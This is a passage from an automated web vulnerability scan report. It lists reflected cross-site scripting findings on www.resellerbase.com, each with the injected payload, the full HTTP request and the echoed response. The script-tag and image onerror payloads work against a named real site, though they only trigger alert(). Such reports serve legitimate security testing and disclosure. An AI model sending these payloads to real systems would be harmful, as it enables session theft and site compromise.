The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 807b4<script>alert(1)</script>34ce7c9041f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico807b4<script>alert(1)</script>34ce7c9041f HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:23:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /favicon.ico807b4<script>alert(1)</script>34ce7c9041f was not found on this server.</p>
...[SNIP]...

2.3825. http://www.resellerbase.com/get_rated.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/get_rated.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b837<script>alert(1)</script>06bab65ddb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /get_rated.php7b837<script>alert(1)</script>06bab65ddb HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /get_rated.php7b837<script>alert(1)</script>06bab65ddb was not found on this server.</p>
...[SNIP]...

2.3826. http://www.resellerbase.com/get_rated.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/get_rated.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 67f0a<script>alert(1)</script>77c57e55ca414477e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /get_rated.php67f0a<script>alert(1)</script>77c57e55ca414477e?query=555-555-0199@example.com&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /get_rated.php67f0a<script>alert(1)</script>77c57e55ca414477e?query=555-555-0199@example.com&pflag=search&submit=Search was not found on this server.</p>
...[SNIP]...

2.3827. http://www.resellerbase.com/get_rated.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/get_rated.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c39da"><img%20src%3da%20onerror%3dalert(1)>b4e58eaaef7 was submitted in the id parameter. This input was echoed as c39da\"><img src=a onerror=alert(1)>b4e58eaaef7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /get_rated.php?id=555-555-0199@example.comc39da"><img%20src%3da%20onerror%3dalert(1)>b4e58eaaef7&pflag=view&submit=Submit HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 18345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>How to Get Rated</ti
...[SNIP]...
<a href="http://www.resellerbase.com/detail.php?id=555-555-0199@example.comc39da\"><img src=a onerror=alert(1)>b4e58eaaef7">
...[SNIP]...

2.3828. http://www.resellerbase.com/get_rated.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/get_rated.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 67ec4<img%20src%3da%20onerror%3dalert(1)>0ff1397e88c was submitted in the id parameter. This input was echoed as 67ec4<img src=a onerror=alert(1)>0ff1397e88c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /get_rated.php?id=555-555-0199@example.com67ec4<img%20src%3da%20onerror%3dalert(1)>0ff1397e88c&pflag=view&submit=Submit HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 18321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>How to Get Rated</ti
...[SNIP]...
<br />
<a href="http://www.resellerbase.com/detail.php?id=555-555-0199@example.com67ec4<img src=a onerror=alert(1)>0ff1397e88c">
...[SNIP]...

2.3829. http://www.resellerbase.com/get_rated.php [query parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/get_rated.php

Issue detail

The value of the query request parameter is copied into the HTML document as text between TITLE tags. The payload 252ab</title><img%20src%3da%20onerror%3dalert(1)>e35c61397324568b6 was submitted in the query parameter. This input was echoed as 252ab</title><img src=a onerror=alert(1)>e35c61397324568b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /get_rated.php?query=555-555-0199@example.com252ab</title><img%20src%3da%20onerror%3dalert(1)>e35c61397324568b6&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: 555-555-0199@example.com252ab</title><img src=a onerror=alert(1)>e35c61397324568b6</title>
...[SNIP]...

2.3830. http://www.resellerbase.com/get_rated.php [query parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/get_rated.php

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload 5b0ea<img%20src%3da%20onerror%3dalert(1)>c2fae72f813da161e was submitted in the query parameter. This input was echoed as 5b0ea<img src=a onerror=alert(1)>c2fae72f813da161e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /get_rated.php?query=555-555-0199@example.com5b0ea<img%20src%3da%20onerror%3dalert(1)>c2fae72f813da161e&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: 555-5
...[SNIP]...
<b>555-555-0199@example.com5b0ea<img src=a onerror=alert(1)>c2fae72f813da161e</b>
...[SNIP]...

2.3831. http://www.resellerbase.com/get_rated.php [query parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/get_rated.php

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64a21"><img%20src%3da%20onerror%3dalert(1)>7ccf27f6790e384da was submitted in the query parameter. This input was echoed as 64a21\"><img src=a onerror=alert(1)>7ccf27f6790e384da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /get_rated.php?query=555-555-0199@example.com64a21"><img%20src%3da%20onerror%3dalert(1)>7ccf27f6790e384da&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: 555-5
...[SNIP]...
<input type="text" name="keyword" size="20"

value="555-555-0199@example.com64a21\"><img src=a onerror=alert(1)>7ccf27f6790e384da"
/>
...[SNIP]...

2.3832. http://www.resellerbase.com/goods-wholesale/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8cdf5<script>alert(1)</script>a40d520823f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale8cdf5<script>alert(1)</script>a40d520823f/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale8cdf5<script>alert(1)</script>a40d520823f/ was not found on this server.</p>
...[SNIP]...

2.3833. http://www.resellerbase.com/goods-wholesale/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55182<script>alert(1)</script>3ee46886f263c6008 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /goods-wholesale55182<script>alert(1)</script>3ee46886f263c6008/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale55182<script>alert(1)</script>3ee46886f263c6008/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.3834. http://www.resellerbase.com/goods-wholesale/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d751d<script>alert(1)</script>33b01808361 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/?d751d<script>alert(1)</script>33b01808361=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/?d751d<script>alert(1)</script>33b01808361=1 was not found on this server.</p>
...[SNIP]...

2.3835. http://www.resellerbase.com/goods-wholesale/ [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload cbc3d<a>815a3180791 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fcbc3d<a>815a3180791 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fcbc3d<a>815a3180791 was not found on this server.</p>
...[SNIP]...

2.3836. http://www.resellerbase.com/goods-wholesale/googlepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98493<script>alert(1)</script>ab4b8bb65dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale98493<script>alert(1)</script>ab4b8bb65dd/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale98493<script>alert(1)</script>ab4b8bb65dd/googlepr.php was not found on this server.</p>
...[SNIP]...

2.3837. http://www.resellerbase.com/goods-wholesale/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23a91<script>alert(1)</script>ac7791c9e9a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/googlepr.php23a91<script>alert(1)</script>ac7791c9e9a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.3838. http://www.resellerbase.com/goods-wholesale/googlepr.php [link_id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload a302d<a>655151937b8 was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/googlepr.php?link_id=6a302d<a>655151937b8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/googlepr.php?link_id=6a302d<a>655151937b8 was not found on this server.</p>
...[SNIP]...

2.3839. http://www.resellerbase.com/goods-wholesale/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a6f0e<script>alert(1)</script>21347485407 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/googlepr.php?a6f0e<script>alert(1)</script>21347485407=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/googlepr.php?a6f0e<script>alert(1)</script>21347485407=1 was not found on this server.</p>
...[SNIP]...

2.3840. http://www.resellerbase.com/goods-wholesale/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ef0a<script>alert(1)</script>ca6fb78cb81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale3ef0a<script>alert(1)</script>ca6fb78cb81/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale3ef0a<script>alert(1)</script>ca6fb78cb81/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3841. http://www.resellerbase.com/goods-wholesale/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5451f<script>alert(1)</script>3f5fa19f36d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/search.php5451f<script>alert(1)</script>3f5fa19f36d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/search.php5451f<script>alert(1)</script>3f5fa19f36d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3842. http://www.resellerbase.com/goods-wholesale/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 6d834<a>6ede6217f4 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/search.php?keyword=search...&Submit3=Search6d834<a>6ede6217f4&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
